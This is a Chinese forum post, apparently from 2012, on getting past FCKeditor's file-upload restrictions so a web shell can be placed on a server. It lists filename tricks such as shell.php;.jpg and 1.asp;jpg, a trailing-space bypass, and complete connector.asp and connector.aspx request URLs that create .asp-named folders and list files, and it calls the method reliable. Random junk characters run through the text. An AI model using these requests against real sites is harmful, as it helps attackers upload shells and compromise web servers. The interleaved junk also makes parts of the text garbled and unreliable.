很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
# r7 X) e) u4 ` L* T# C6 N `6 G3 h
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
0 J, `. d9 A3 [# c$ V0 E) z, {
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。/ ]$ q9 y* R: B4 G4 I9 i
: F8 ^6 N1 O2 T" ^. t9 y
突破建立文件夹:4 q; N7 E0 ]6 ]+ R7 @
- Y# _/ k& H. s- I) A
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp: B: L! P1 u2 ~" B2 r @1 c2 p7 N
7 x2 S, I: }) Y M' F. ]
参数:! y. ^) U. l* Y
+ P$ S( q$ p2 u4 l& }当前目录名:CurrentFolder=/qing.asp
* k. ^) k. X( y! Q Z s2 h+ {1 x& G* W, R [3 G& c. ~( j! L* O& v
新的目录名:NewFolderName=x.asp5 m1 h. G) x2 M# E( ]7 L+ H) L
% T8 t2 z' I) R3 ?; p/ F
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……$ r5 C1 N8 o8 ?4 J" o* E" {7 n! E
4 c+ n: F! k) K! s那么 x.asp 就已经建立生成了,此方法百试百灵!/ b4 G# d9 ]; s& @$ _) V: o7 @
! i5 X' C1 ?% b7 D1 L! p
新建文件夹参数 x.asp,基本都能搞定。
5 g# W( r7 w8 ?) \7 ^0 T2 V4 o) x+ `3 i' F- @5 V2 o
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
8 w9 F* U5 l. {" L1 u
! k' I4 B, [8 V- i# C4 p: Kaspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
! c7 E" s- H" p! ^2 `
/ {7 j7 \+ x1 ?, e { H! s+ b获取文件列表/ f/ ], T9 P* H6 D* q# E
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
; i8 ]; x& F: I# H- i
$ u% w( d* x' H0 m5 g; @, w) c |
发表于 2012-12-31 09:27:09
收藏
分享
支持
反对